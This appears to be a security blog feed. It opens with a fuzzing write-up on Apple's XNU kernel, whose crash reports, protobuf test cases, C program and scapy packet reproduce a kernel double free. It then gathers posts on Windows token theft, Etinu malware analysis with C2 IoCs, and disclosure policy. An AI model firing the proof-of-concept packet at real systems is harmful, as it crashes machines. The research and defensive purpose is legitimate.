    #7 0x4de0ef in TestOneProtoInput(Session const&) fuzz/net_fuzzer.cc:720:9

0x61d00029f474 is located 12 bytes to the left of 2048-byte region [0x61d00029f480,0x61d00029fc80)

allocated by thread T0 here:

    #0 0x4a0479 in calloc /b/s/w/ir/cache/builder/src/third_party/llvm/compiler-rt/lib/asan/asan_malloc_linux.cpp:154:3

    #1 0x7ff64bd82b20 in mbuf_create fuzz/zalloc.c:157:45

    #2 0x7ff64bd8319e in mcache_alloc fuzz/zalloc.c:187:12

    #3 0x7ff64b69ae84 in m_getcl bsd/kern/uipc_mbuf.c:3962:6

    #4 0x7ff64ba9e15c in icmp_error bsd/netinet/ip_icmp.c:296:7

    #5 0x7ff64baaff9b in ip_dooptions bsd/netinet/ip_input.c:3577:2

    #6 0x7ff64baa921b in ip_input bsd/netinet/ip_input.c:2230:34

    #7 0x7ff64bd7d440 in ip_input_wrapper fuzz/backend.c:132:3

    #8 0x4dbe29 in DoIpInput fuzz/net_fuzzer.cc:610:7

    #9 0x4de0ef in TestOneProtoInput(Session const&) fuzz/net_fuzzer.cc:720:9

When we inspect the test case, we see that a single raw IPv4 packet was generated to trigger this bug. This is to be expected, as the bug doesn’t require an existing connection, and looking at the stack, we can see that the test case triggered the bug in the IPv4-specific ip_input path.

commands {

  ip_input {

    raw_ip4: "M\001\000I\001\000\000\000\000\000\000\000III\333\333\333\333\333\333\333\333\333\333IIIIIIIIIIIIII\000\000\000\000\000III\333\333\333\333\333\333\333\333\333\333\333\333IIIIIIIIIIIIII"

  }

}

data_provider: ""


If we fix that issue and fuzz a bit longer, we soon see another crash, this time in the MPTCP stack. This is Ian’s MPTCP vulnerability. The ASAN report looks strange though. Why is it crashing during garbage collection in
mptcp_session_destroy? The original vulnerability was an OOB write, but ASAN couldn’t catch it because it corrupted memory within a struct. This is a well-known shortcoming of ASAN and similar mitigations, importantly the upcoming MTE. This means we don’t catch the bug until later, when a randomly corrupted pointer is accessed.

==1640571==ERROR: AddressSanitizer: attempting free on address which was not malloc()-ed: 0x6190000079dc in thread T0

    #0 0x4a0094 in free /b/s/w/ir/cache/builder/src/third_party/llvm/compiler-rt/lib/asan/asan_malloc_linux.cpp:123:3

    #1 0x7fbdfc7a16b0 in _FREE fuzz/zalloc.c:293:36

    #2 0x7fbdfc52b624 in mptcp_session_destroy bsd/netinet/mptcp_subr.c:742:3

    #3 0x7fbdfc50c419 in mptcp_gc bsd/netinet/mptcp_subr.c:4615:3

    #4 0x7fbdfc4ee052 in mp_timeout bsd/netinet/mp_pcb.c:118:16

    #5 0x7fbdfc79b232 in clear_all fuzz/backend.c:83:3

    #6 0x4dfd5c in TestOneProtoInput(Session const&) fuzz/net_fuzzer.cc:1010:3

0x6190000079dc is located 348 bytes inside of 920-byte region [0x619000007880,0x619000007c18)

allocated by thread T0 here:

    #0 0x4a0479 in calloc /b/s/w/ir/cache/builder/src/third_party/llvm/compiler-rt/lib/asan/asan_malloc_linux.cpp:154:3

    #1 0x7fbdfc7a03d4 in zalloc fuzz/zalloc.c:37:10

    #2 0x7fbdfc4ee710 in mp_pcballoc bsd/netinet/mp_pcb.c:222:8

    #3 0x7fbdfc53cf8a in mptcp_attach bsd/netinet/mptcp_usrreq.c:211:15

    #4 0x7fbdfc53699e in mptcp_usr_attach bsd/netinet/mptcp_usrreq.c:128:10

    #5 0x7fbdfc0e1647 in socreate_internal bsd/kern/uipc_socket.c:784:10

    #6 0x7fbdfc0e23a4 in socreate bsd/kern/uipc_socket.c:871:9

    #7 0x7fbdfc118695 in socket_common bsd/kern/uipc_syscalls.c:266:11

    #8 0x7fbdfc1182d1 in socket bsd/kern/uipc_syscalls.c:214:9

    #9 0x7fbdfc79a26e in socket_wrapper fuzz/syscall_wrappers.c:371:10

    #10 0x4dd275 in TestOneProtoInput(Session const&) fuzz/net_fuzzer.cc:655:19

Here’s the protobuf input for the crashing testcase:

commands {

  socket {

    domain: AF_MULTIPATH

    so_type: SOCK_STREAM

    protocol: IPPROTO_IP

  }

}

commands {

  connectx {

    socket: FD_0

    endpoints {

      sae_srcif: IFIDX_CASE_0

      sae_srcaddr {

        sockaddr_generic {

          sa_family: AF_MULTIPATH

          sa_data: "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\304"

        }

      }

      sae_dstaddr {

        sockaddr_generic {

          sa_family: AF_MULTIPATH

          sa_data: ""

        }

      }

    }

    associd: ASSOCID_CASE_0

    flags: CONNECT_DATA_IDEMPOTENT

    flags: CONNECT_DATA_IDEMPOTENT

    flags: CONNECT_DATA_IDEMPOTENT

  }

}

commands {

  connectx {

    socket: FD_0

    endpoints {

      sae_srcif: IFIDX_CASE_0

      sae_dstaddr {

        sockaddr_generic {

          sa_family: AF_MULTIPATH

          sa_data: ""

        }

      }

    }

    associd: ASSOCID_CASE_0

    flags: CONNECT_DATA_IDEMPOTENT

  }

}

commands {

  connectx {

    socket: FD_0

    endpoints {

      sae_srcif: IFIDX_CASE_0

      sae_srcaddr {

        sockaddr_generic {

          sa_family: AF_MULTIPATH

          sa_data: ""

        }

      }

      sae_dstaddr {

        sockaddr_generic {

          sa_family: AF_MULTIPATH

          sa_data: "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\304"

        }

      }

    }

    associd: ASSOCID_CASE_0

    flags: CONNECT_DATA_IDEMPOTENT

    flags: CONNECT_DATA_IDEMPOTENT

    flags: CONNECT_DATA_AUTHENTICATED

  }

}

commands {

  connectx {

    socket: FD_0

    endpoints {

      sae_srcif: IFIDX_CASE_0

      sae_dstaddr {

        sockaddr_generic {

          sa_family: AF_MULTIPATH

          sa_data: ""

        }

      }

    }

    associd: ASSOCID_CASE_0

    flags: CONNECT_DATA_IDEMPOTENT

  }

}

commands {

  close {

    fd: FD_8

  }

}

commands {

  ioctl_real {

    siocsifflags {

      ifr_name: LO0

      flags: IFF_LINK1

    }

  }

}

commands {

  close {

    fd: FD_8

  }

}

data_provider: "\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025"

Hmm, that’s quite large and hard to follow. Is the bug really that complicated? We can use libFuzzer’s crash minimization feature to find out. Protobuf-based test cases simplify nicely because even large test cases are already structured, so we can randomly edit and remove nodes from the message. After about a minute of automated minimization, we end up with the test shown below.

commands {

  socket {

    domain: AF_MULTIPATH

    so_type: SOCK_STREAM

    protocol: IPPROTO_IP

  }

}

commands {

  connectx {

    socket: FD_0

    endpoints {

      sae_srcif: IFIDX_CASE_1

      sae_dstaddr {

        sockaddr_generic {

          sa_family: AF_MULTIPATH

          sa_data: "bugmbuf_debutoeloListen_dedeloListen_dedebuloListete_debugmbuf_debutoeloListen_dedeloListen_dedebuloListeListen_dedebuloListe_dtrte" # string length 131

        }

      }

    }

    associd: ASSOCID_CASE_0

  }

}

data_provider: ""


This is a lot easier to read! It appears that SockFuzzer managed to open a socket from the
AF_MULTIPATH domain and called connectx on it with a sockaddr using an unexpected sa_family, in this case AF_MULTIPATH. Then the large sa_data field was used to overwrite memory. You can see some artifacts of heuristics used by the fuzzer to guess strings as “listen” and “mbuf” appear in the input. This testcase could be further simplified by modifying the sa_data to a repeated character, but I left it as is so you can see exactly what it’s like to work with the output of this fuzzer.

In my experience, the protobuf-formatted syscalls and packet descriptions were highly useful for reproducing crashes and tended to work on the first attempt. I didn’t have an excellent setup for debugging on-device, so I tried to lean on the fuzzing framework as much as I could to understand issues before proceeding with the expensive process of reproducing them.

In my previous post describing the “SockPuppet” vulnerability, I walked through one of the newly discovered vulnerabilities, from protobuf to exploit. I’d like to share another original protobuf bug report for a remotely-triggered vulnerability I reported here.

commands {

  socket {

    domain: AF_INET6

    so_type: SOCK_RAW

    protocol: IPPROTO_IP

  }

}

commands {

  set_sock_opt {

    level: SOL_SOCKET

    name: SO_RCVBUF

    val: "\021\000\000\000"

  }

}

commands {

  set_sock_opt {

    level: IPPROTO_IPV6

    name: IP_FW_ZERO

    val: "\377\377\377\377"

  }

}

commands {

  ip_input {

    tcp6_packet {

      ip6_hdr {

        ip6_hdrctl {

          ip6_un1_flow: 0

          ip6_un1_plen: 0

          ip6_un1_nxt: IPPROTO_ICMPV6

          ip6_un1_hlim: 0

        }

        ip6_src: IN6_ADDR_LOOPBACK

        ip6_dst: IN6_ADDR_ANY

      }

      tcp_hdr {

        th_sport: PORT_2

        th_dport: PORT_1

        th_seq: SEQ_1

        th_ack: SEQ_1

        th_off: 0

        th_win: 0

        th_sum: 0

        th_urp: 0

        is_pure_syn: false

        is_pure_ack: false

      }

      data: "\377\377\377\377\377\377\377\377\377\377\377\377q\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377"

    }

  }

}

data_provider: ""

This automatically minimized test case requires some human translation to a report that’s actionable by developers who don’t have access to our fuzzing framework. The test creates a socket and sets some options before delivering a crafted ICMPv6 packet. You can see how the packet grammar we specified comes in handy. I started by transcribing the first three syscall messages directly by writing the following C program.

#include <sys/socket.h>

#define __APPLE_USE_RFC_3542

#include <netinet/in.h>

#include <stdio.h>

#include <unistd.h>

int main() {

    int fd = socket(AF_INET6, SOCK_RAW, IPPROTO_IP);

    if (fd < 0) {

        printf("failed\n");

        return 0;

    }

    int res;

    // This is not needed to cause a crash on macOS 10.14.6, but you can

    // try setting this option if you can't reproduce the issue.

    // int space = 1;

    // res = setsockopt(fd, SOL_SOCKET, SO_RCVBUF, &space, sizeof(space));

    // printf("res1: %d\n", res);

    int enable = 1;

    res = setsockopt(fd, IPPROTO_IPV6, IPV6_RECVPATHMTU, &enable, sizeof(enable));

    printf("res2: %d\n", res);

    // Keep the socket open without terminating.

    while (1) {

        sleep(5);

    }

    close(fd);

    return 0;

}

With the socket open, it’s now a matter of sending a special ICMPv6 packet to trigger the bug. Using the original crash as a guide, I reviewed the code around the crashing instruction to understand which parts of the input were relevant. I discovered that sending a “packet too big” notification would reach the buggy code, so I used the scapy library for Python to send the buggy packet locally. My kernel panicked, confirming the double free vulnerability.

from scapy.all import sr1, IPv6, ICMPv6PacketTooBig, raw

outer = IPv6(dst="::1") / ICMPv6PacketTooBig() / ("\x41"*40)

print(raw(outer).hex())

p = sr1(outer)

if p:

    p.show()

Creating a working PoC from the crashing protobuf input took about an hour, thanks to the straightforward mapping from grammar to syscalls/network input and the utility of being able to debug the local crashing “kernel” using gdb.

Drawbacks

Any fuzzing project of this size will require design decisions that have some tradeoffs. The most obvious issue is the inability to detect race conditions. Threading bugs can be found with fuzzing but are still best left to static analysis and manual review as fuzzers can’t currently deal with the state space of interleaving threads. Maybe this will change in the future, but today it’s an issue. I accepted this problem and removed threading completely from the fuzzer; some bugs were missed by this, such as a race condition in the bind syscall.

Another issue lies in the fact that by replacing so much functionality by hand, it’s hard to extend the fuzzer trivially to support additional attack surfaces. This is evidenced by another issue I missed in packet filtering. I don’t support VFS at the moment, so I can’t access the bpf device. A syzkaller-like project would have less trouble with supporting this code since VFS would already be working. I made an explicit decision to build a simple tool that works very effectively and meticulously, but this can mean missing some low hanging fruit due to the effort involved.

Per-test case determinism is an issue that I’ve solved only partially. If test cases aren’t deterministic, libFuzzer becomes less efficient as it thinks some tests are finding new coverage when they really depend on one that was run previously. To mitigate this problem, I track open file descriptors manually and run all of the garbage collection thread functions after each test case. Unfortunately, there are many ioctls that change state in the background. It’s hard to keep track of them to clean up properly but they are important enough that it’s not worth disabling them just to improve determinism. If I were working on a long-term well-resourced overhaul of the XNU network stack, I would probably make sure there’s a way to cleanly tear down the whole stack to prevent this problem.

Perhaps the largest caveat of this project is its reliance on source code. Without the efficiency and productivity losses that come with binary-only research, I can study the problem more closely to the source. But I humbly admit that this approach ignores many targets and doesn’t necessarily match real attackers’ workflows. Real attackers take the shortest path they can to find an exploitable vulnerability, and often that path is through bugs found via binary-based fuzzing or reverse engineering and auditing. I intend to discover some of the best practices for fuzzing with the source and then migrate this approach to work with binaries. Binary instrumentation can assist in coverage guided fuzzing, but some of my tricks around substituting fake implementations or changing behavior to be more fuzz-friendly is a more significant burden when working with binaries. But I believe these are tractable problems, and I expect researchers can adapt some of these techniques to binary-only fuzzing efforts, even if there is additional overhead.

Open Sourcing and Future Work

This fuzzer is now open source on GitHub. I invite you to study the code and improve it! I’d like to continue the development of this fuzzer semi-publicly. Some modifications that yield new vulnerabilities may need to be embargoed until relevant patches go out. Still, I hope that I can be as transparent as possible in my research. By working publicly, it may be possible to bring the original XNU project and this fuzzer closer together by sharing the efforts. I’m hoping the upstream developers can make use of this project to perform their own testing and perhaps make their own improvements to XNU to make this type of testing more accessible. There’s plenty of remaining work to improve the existing grammar, add support for new subsystems, and deal with some high-level design improvements such as adding proper threading support.

An interesting property of the current fuzzer is that despite reaching coverage saturation on ClusterFuzz after many months, there is still reachable but uncovered code due to the enormous search space. This means that improvements in coverage-guided fuzzing could find new bugs. I’d like to encourage teams who perform fuzzing engine research to use this project as a baseline. If you find a bug, you can take the credit for it! I simply hope you share your improvements with me and the rest of the community.

Conclusion

Modern kernel development has some catching up to do. XNU and Linux suffer from some process failures that lead to shipping security regressions. Kernels, perhaps the most security-critical component of operating systems, are becoming increasingly fragile as memory corruption issues become easier to discover. Implementing better mitigations is half the battle; we need better kernel unit testing to make identifying and fixing (even non-security) bugs cheaper.

Since my last post, Apple has increased the frequency of its open-source releases. This is great for end-user security. The more publicly that Apple can develop XNU, the more that external contributors like myself may have a chance to contribute fixes and improvements directly. Maintaining internal branches for upcoming product launches while keeping most development open has helped Chromium and Android security, and I believe XNU’s development could follow this model. As software engineering grows as a field, our experience has shown us that open, shared, and continuous development has a real impact on software quality and stability by improving developer productivity. If you don’t invest in CI, unit testing, security reviews, and fuzzing, attackers may do that for you - and users pay the cost whether they recognize it or not.

New “Always-on” Application for MacOS (April updates)

22 April 2021 at 08:27
New “Always-on” Application for MacOS (April updates)

As cyberattacks targeting mobile devices are on the rise, we continue to see massive adoption from both the private and public sectors. We are really excited to share two new features which will dramatically improve the ZecOps experience! 

New “Always-on” Application for MacOS

ZecOps is making it even easier for users to perform complex investigations of their mobile devices. Now, users can inspect their mobile devices automatically each time the phone is connected to their laptop. ZecOps for Mobile supports both iOS and Android.

Send an inspection link to a customer or colleague

ZecOps administrators now have the ability to generate a unique link to download the ZecOps Collector App from the ZecOps Dashboard. The link can then be shared with the person/group whose device you wish to inspect via email, text, or Slack.

The Collector App can be downloaded on any laptop. This feature is ideal for incident responders, managed service providers, and SOC operators.

Learn more about ZecOps Mobile EDR

Access Token Theft and Manipulation Attacks – A Door to Local Privilege Escalation

20 April 2021 at 15:27
how to run a virus scan

Executive Summary

Many malware attacks designed to inflict damage on a network are armed with lateral movement capabilities. Post initial infection, such malware would usually need to perform a higher privileged task or execute a privileged command on the compromised system to be able to further enumerate the infection targets and compromise more systems on the network. Consequently, at some point during its lateral movement activities, it would need to escalate its privileges using one or the other privilege escalation techniques. Once malware or an attacker successfully escalates its privileges on the compromised system, it will acquire the ability to perform stealthier lateral movement, usually executing its tasks under the context of a privileged user, as well as bypassing mitigations like User Account Control.

Process access token manipulation is one such privilege escalation technique which is widely adopted by malware authors. These set of techniques include process access token theft and impersonation, which eventually allows malware to advance its lateral movement activities across the network in the context of another logged in user or higher privileged user.

When a user authenticates to Windows via console (interactive logon), a logon session is created, and an access token is granted to the user. Windows manages the identity, security, or access rights of the user on the system with this access token, essentially determining what system resources they can access and what tasks can be performed. An access token for a user is primarily a kernel object and an identification of that user in the system, which also contains many other details like groups, access rights, integrity level of the process, privileges, etc. Fundamentally, a user’s logon session has an access token which also references their credentials to be used for Windows single sign on (SSO) authentication to access the local or remote network resources.

Once the attacker gains an initial foothold on the target by compromising the initial system, they would want to move around the network laterally to access more resource or critical assets. One of the ways for an attacker to achieve this is to use the identity or credentials of already logged-on users on the compromised machine to pivot to other systems or escalate their privileges and perform the lateral movement in the context of another logged on higher privileged user. Process access token manipulation helps the attackers to precisely accomplish this goal.

For our YARA rule, MITRE ATT&CK techniques and to learn more about the technical details of token manipulation attacks and how malware executes these attacks successfully at the code level, read our complete technical analysis here.

Coverage

McAfee On-Access-Scan has a generic detection for this nature of malware  as shown in the below screenshot:

Additionally, the YARA rule mentioned at the end of the technical analysis document can also be used to detect the token manipulation attacks by importing the rule in the Threat detection solutions like McAfee Advance Threat Defence, this behaviour can be detected.

Summary of the Threat

Several types of malware and advanced persistent threats abuse process tokens to gain elevated privileges on the system. Malware can take multiple routes to achieve this goal. However, in all these routes, it would abuse the Windows APIs to execute the token stealing or token impersonation to gain elevated privileges and advance its lateral movement activities.

  • If the current logged on user on the compromised or infected machine is a part of the administrator group of users OR running a process with higher privileges (e.g., by using “runas” command), malware can abuse the privileges of the process’s access token to elevate its privileges on the system, thereby enabling itself to perform privileged tasks.
  • Malware can use multiple Windows APIs to enumerate the Windows processes running with higher privileges (usually SYSTEM level privileges), acquire the access tokens of those processes and start new processes with the acquired token. This results in the new process being started in the context of the user represented by the token, which is SYSTEM.
  • Malware can also execute a token impersonation attack where it can duplicate the access tokens of the higher privileged SYSTEM level process, convert it into the impersonation token by using appropriate Windows functionality and then impersonate the SYSTEM user on the infected machine, thereby elevating its privileges.
  • These token manipulation attacks will allow malware to use the credentials of the current logged on user or the credentials of another privileged user to authenticate to the remote network resource, leading to advancement of its lateral movement activities.
  • These attack techniques allows malware to bypass multiple mitigations like UAC, access control lists, heuristics detection techniques and allowing malware to remain stealthier while moving laterally inside the network.

 

Access Token Theft and Manipulation Attacks – Technical Analysis

Access Token Theft and Manipulation Attacks – A Door to Local Privilege Escalation.

Read Now

 

The post Access Token Theft and Manipulation Attacks – A Door to Local Privilege Escalation appeared first on McAfee Blog.

Clever Billing Fraud Applications on Google Play: Etinu

19 April 2021 at 21:42
Saibāsekyuriti

Authored by: Sang Ryol Ryu and Chanung Pak

A new wave of fraudulent apps has made its way to the Google Play store, targeting Android users in Southwest Asia and the Arabian Peninsula as well—to the tune of more than 700,000 downloads before detection by McAfee Mobile Research and co-operation with Google to remove the apps.

Figure 1. Infected Apps on Google Play

Posing as photo editors, wallpapers, puzzles, keyboard skins, and other camera-related apps, the malware embedded in these fraudulent apps hijack SMS message notifications and then make unauthorized purchases. While apps go through a review process to ensure that they are legitimate, these fraudulent apps made their way into the store by submitting a clean version of the app for review and then introducing the malicious code via updates to the app later.

Figure 2. Negative reviews on Google Play

McAfee Mobile Security detects this threat as Android/Etinu and alerts mobile users if they are present. The McAfee Mobile Research team continues to monitor this threat and is likewise continuing its co-operation with Google to remove these and other malicious applications on Google Play.

Technical analysis

In terms of details, the malware embedded in these apps takes advantage of dynamic code loading. Encrypted payloads of malware appear in the assets folder associated with the app, using names such as “cache.bin,” “settings.bin,” “data.droid,” or seemingly innocuous “.png” files, as illustrated below.

Figure 3. Encrypted resource sneaked into the assets folder

Figure 4. Decryption flow

The figure above shows the decryption flow. Firstly, the hidden malicious code in the main .apk opens “1.png” file in the assets folder, decrypts it to “loader.dex,” and then loads the dropped .dex. The “1.png” is encrypted using RC4 with the package name as the key. The first payload creates HTTP POST request to the C2 server.

Interestingly, this malware uses key management servers. It requests keys from the servers for the AES encrypted second payload, “2.png”. And the server returns the key as the “s” value of JSON. Also, this malware has self-update function. When the server responds “URL” value, the content in the URL is used instead of “2.png”. However, servers do not always respond to the request or return the secret key.

Figure 5. Updated payload response

As always, the most malicious functions reveal themselves in the final stage. The malware hijacks the Notification Listener to steal incoming SMS messages like Android Joker malware does, without the SMS read permission. Like a chain system, the malware then passes the notification object to the final stage. When the notification has arisen from the default SMS package, the message is finally sent out using WebView JavaScript Interface.

Figure 6. Notification delivery flow

As a result of our additional investigation on C2 servers, following information was found, including carrier, phone number, SMS message, IP address, country, network status, and so forth—along with auto-renewing subscriptions:

Figure 7. Leaked data

Further threats like these to come?

We expect that threats which take advantage of Notification Listener will continue to flourish. The McAfee Mobile Research team continues to monitor these threats and protect customers by analyzing potential malware and working with app stores to remove it. Further, using McAfee Mobile Security can detect such threats and protect you from them via its regular updates. However, it’s important to pay attention to apps that request SMS-related permissions and Notification Listener permissions. Simply put, legitimate photo and wallpaper apps simply won’t ask for those because they’re not necessary for such apps to run. If a request seems suspicious, don’t allow it.

Technical Data and IOCs

MITRE ATT&CK Matrix

IoCs

08C4F705D5A7C9DC7C05EDEE3FCAD12F345A6EE6832D54B758E57394292BA651 com.studio.keypaper2021
CC2DEFEF5A14F9B4B9F27CC9F5BBB0D2FC8A729A2F4EBA20010E81A362D5560C com.pip.editor.camera
007587C4A84D18592BF4EF7AD828D5AAA7D50CADBBF8B0892590DB48CCA7487E org.my.favorites.up.keypaper
08FA33BC138FE4835C15E45D1C1D5A81094E156EEF28D02EA8910D5F8E44D4B8 com.super.color.hairdryer
9E688A36F02DD1B1A9AE4A5C94C1335B14D1B0B1C8901EC8C986B4390E95E760 com.ce1ab3.app.photo.editor
018B705E8577F065AC6F0EDE5A8A1622820B6AEAC77D0284852CEAECF8D8460C com.hit.camera.pip
0E2ACCFA47B782B062CC324704C1F999796F5045D9753423CF7238FE4CABBFA8 com.daynight.keyboard.wallpaper
50D498755486D3739BE5D2292A51C7C3D0ADA6D1A37C89B669A601A324794B06 com.super.star.ringtones

URLs

d37i64jgpubcy4.cloudfront.net

d1ag96m0hzoks5.cloudfront.net

dospxvsfnk8s8.cloudfront.net

d45wejayb5ly8.cloudfront.net

d3u41fvcv6mjph.cloudfront.net

d3puvb2n8wcn2r.cloudfront.net

d8fkjd2z9mouq.cloudfront.net

d22g8hm4svq46j.cloudfront.net

d3i3wvt6f8lwyr.cloudfront.net

d1w5drh895wnkz.cloudfront.net

The post Clever Billing Fraud Applications on Google Play: Etinu appeared first on McAfee Blog.

Policy and Disclosure: 2021 Edition

By: Ryan
15 April 2021 at 16:02

Posted by Tim Willis, Project Zero

At Project Zero, we spend a lot of time discussing and evaluating vulnerability disclosure policies and their consequences for users, vendors, fellow security researchers, and software security norms of the broader industry. We aim to be a vulnerability research team that benefits everyone, working across the entire ecosystem to help make 0-day hard.

 

We remain committed to adapting our policies and practices to best achieve our mission,  demonstrating this commitment at the beginning of last year with our 2020 Policy and Disclosure Trial.

As part of our annual year-end review, we evaluated our policy goals, solicited input from those that receive most of our reports, and adjusted our approach for 2021.

Summary of changes for 2021

Starting today, we're changing our Disclosure Policy to refocus on reducing the time it takes for vulnerabilities to get fixed, improving the current industry benchmarks on disclosure timeframes, as well as changing when we release technical details.

The short version: Project Zero won't share technical details of a vulnerability for 30 days if a vendor patches it before the 90-day or 7-day deadline. The 30-day period is intended for user patch adoption.

The full list of changes for 2021:

2020 Trial ("Full 90")

2021 Trial ("90+30")

  1. Public disclosure occurs 90 days after an initial vulnerability report, regardless of when the bug is fixed. Technical details (initial report plus any additional work) are published on Day 90. A 14-day grace period* is allowed.
            
    Earlier disclosure with mutual agreement.
  1. Disclosure deadline of 90 days. If an issue remains unpatched after 90 days, technical details are published immediately. If the issue is fixed within 90 days, technical details are published 30 days after the fix. A 14-day grace period* is allowed.
            
    Earlier disclosure with mutual agreement.
  1. For vulnerabilities that were actively exploited in-the-wild against users, public disclosure occurred 7 days after the initial vulnerability report, regardless of when the bug is fixed.




    In-the wild vulnerabilities are not offered a grace period
    *

    Earlier disclosure with mutual agreement.
  1. Disclosure deadline of 7 days for issues that are being actively exploited in-the-wild against users. If an issue remains unpatched after 7 days, technical details are published immediately. If the issue is fixed within 7 days, technical details are published 30 days after the fix.

    Vendors can request a 3-day grace period* for in-the-wild bugs.

    Earlier disclosure with mutual agreement.
  1. Technical details are immediately published when a vulnerability is patched in the grace period*.

    (e.g. Patched on Day 100 in grace period, disclosure on Day 100)
  1. If a grace period* is granted, it uses up a portion of the 30-day patch adoption period.

    (e.g. Patched on Day 100 in grace period, disclosure on Day 120)

Elements of the 2020 trial that will carry over to 2021:

2020 Trial + 2021 Trial

1. Policy goals:

  • Faster patch development
  • Thorough patch development
  • Improved patch adoption

2. If Project Zero discovers a variant of a previously reported Project Zero bug, technical details of the variant will be added to the existing Project Zero report (which may be already public) and the report will not receive a new deadline.

3. If a 90-day deadline is missed, technical details are made public on Day 90, unless a grace period* is requested and confirmed prior to deadline expiry.

4. If a 7-day deadline is missed, technical details are made public on Day 7, unless a grace period* is requested and confirmed prior to deadline expiry.

* The grace period is an additional 14 days that a vendor can request if they do not expect that a reported vulnerability will be fixed within 90 days, but do expect it to be fixed within 104 days. Grace periods will not be granted for vulnerabilities that are expected to take longer than 104 days to fix.  For vulnerabilities that are being actively exploited and reported under the 7 day deadline, the grace period is an additional 3 days that a vendor can request if they do not expect that a reported vulnerability will be fixed within 7 days, but do expect it to be fixed within 10 days.

Rationale on changes for 2021

As we discussed in last year's "Policy and Disclosure: 2020 Edition", our three vulnerability disclosure policy goals are:

  1. Faster patch development: shorten the time between a bug report and a fix being available for users.
  2. Thorough patch development: ensure that each fix is correct and comprehensive.
  3. Improved patch adoption: shorten the time between a patch being released and users installing it.

Our policy trial for 2020 aimed to balance all three of these goals, while keeping our policy consistent, simple, and fair. Vendors were given 90 days to work on the full cycle of patch development and patch adoption. The idea was if a vendor wanted more time for users to install a patch, they would prioritize shipping the fix earlier in the 90 day cycle rather than later.

In practice however, we didn't observe a significant shift in patch development timelines, and we continued to receive feedback from vendors that they were concerned about publicly releasing technical details about vulnerabilities and exploits before most users had installed the patch. In other words, the implied timeline for patch adoption wasn't clearly understood.

The goal of our 2021 policy update is to make the patch adoption timeline an explicit part of our vulnerability disclosure policy. Vendors will now have 90 days for patch development, and an additional 30 days for patch adoption.

This 90+30 policy gives vendors more time than our current policy, as jumping straight to a 60+30 policy (or similar) would likely be too abrupt and disruptive. Our preference is to choose a starting point that can be consistently met by most vendors, and then gradually lower both patch development and patch adoption timelines.

For example, based on our current data tracking vulnerability patch times, it's likely that we can move to a "84+28" model for 2022 (having deadlines evenly divisible by 7 significantly reduces the chance our deadlines fall on a weekend). Beyond that, we will keep a close eye on the data and continue to encourage innovation and investment in bug triage, patch development, testing, and update infrastructure.

Risk and benefits

Much of the debate around vulnerability disclosure is caught up on the issue of whether rapidly releasing technical details benefits attackers or defenders more. From our time in the defensive community, we've seen firsthand how the open and timely sharing of technical details helps protect users across the Internet. But we also have listened to the concerns from others around the much more visible "opportunistic" attacks that may come from quickly releasing technical details.

We continue to believe that the benefits to the defensive community of Project Zero's publications outweigh the risks of disclosure, but we're willing to incorporate feedback into our policy in the interests of getting the best possible results for user security. Security researchers need to be able to work closely with vendors and open source projects on a range of technical, process, and policy issues -- and heated discussions about the risk and benefits of technical vulnerability details or proof-of-concept exploits has been a significant roadblock.

While the 90+30 policy will be a slight regression from the perspective of rapidly releasing technical details, we're also signaling our intent to shorten our 90-day disclosure deadline in the near future. We anticipate slowly reducing time-to-patch and speeding up patch adoption over the coming years until a steady state is reached.

Finally, we understand that this change will make it more difficult for the defensive community to quickly perform their own risk assessment, prioritize patch deployment, test patch efficacy, quickly find variants, deploy available mitigations, and develop detection signatures. We're always interested in hearing about Project Zero's publications being used for defensive purposes, and we encourage users to ask their vendors/suppliers for actionable technical details to be shared in security advisories.

Conclusion

Moving to a "90+30" model allows us to decouple time to patch from patch adoption time, reduce the contentious debate around attacker/defender trade-offs and the sharing of technical details, while advocating to reduce the amount of time that end users are vulnerable to known attacks.

Disclosure policy is a complex topic with many trade-offs to be made, and this wasn't an easy decision to make. We are optimistic that our 2021 policy and disclosure trial lays a good foundation for the future, and has a balance of incentives that will lead to positive improvements to user security.

Exploiting System Mechanic Driver

By: voidsec
14 April 2021 at 13:30

Last month we (last & VoidSec) took the amazing Windows Kernel Exploitation Advanced course from Ashfaq Ansari (@HackSysTeam) at NULLCON. The course was very interesting and covered core kernel space concepts as well as advanced mitigation bypasses and exploitation. There was also a nice CTF and its last exercise was: “Write an exploit for System […]

The post Exploiting System Mechanic Driver appeared first on VoidSec.

McAfee Labs Report Reveals Latest COVID-19 Threats and Malware Surges

13 April 2021 at 04:01

The McAfee Advanced Threat Research team today published the McAfee Labs Threats Report: April 2021.

In this edition, we present new findings in our traditional threat statistical categories – as well as our usual malware, sectors, and vectors – imparted in a new, enhanced digital presentation that’s more easily consumed and interpreted.

Historically, our reports detailed the volume of key threats, such as “what is in the malware zoo.” The introduction of MVISION Insights in 2020 has since made it possible to track the prevalence of campaigns, as well as, their associated IoCs, and determine the in-field detections. This latest report incorporates not only the malware zoo but new analysis for what is being detected in the wild.

The Q3 and Q4 2020 findings include:

  • COVID-19-themed cyber-attack detections increased 114%
  • New malware samples averaging 648 new threats per minute
  • 1 million external attacks observed against MVISION Cloud user accounts
  • Powershell threats spiked 208%
  • Mobile malware surged 118%

Additional Q3 and Q4 2020 content includes:

  • Leading MITRE ATT&CK techniques
  • Prominent exploit vulnerabilities
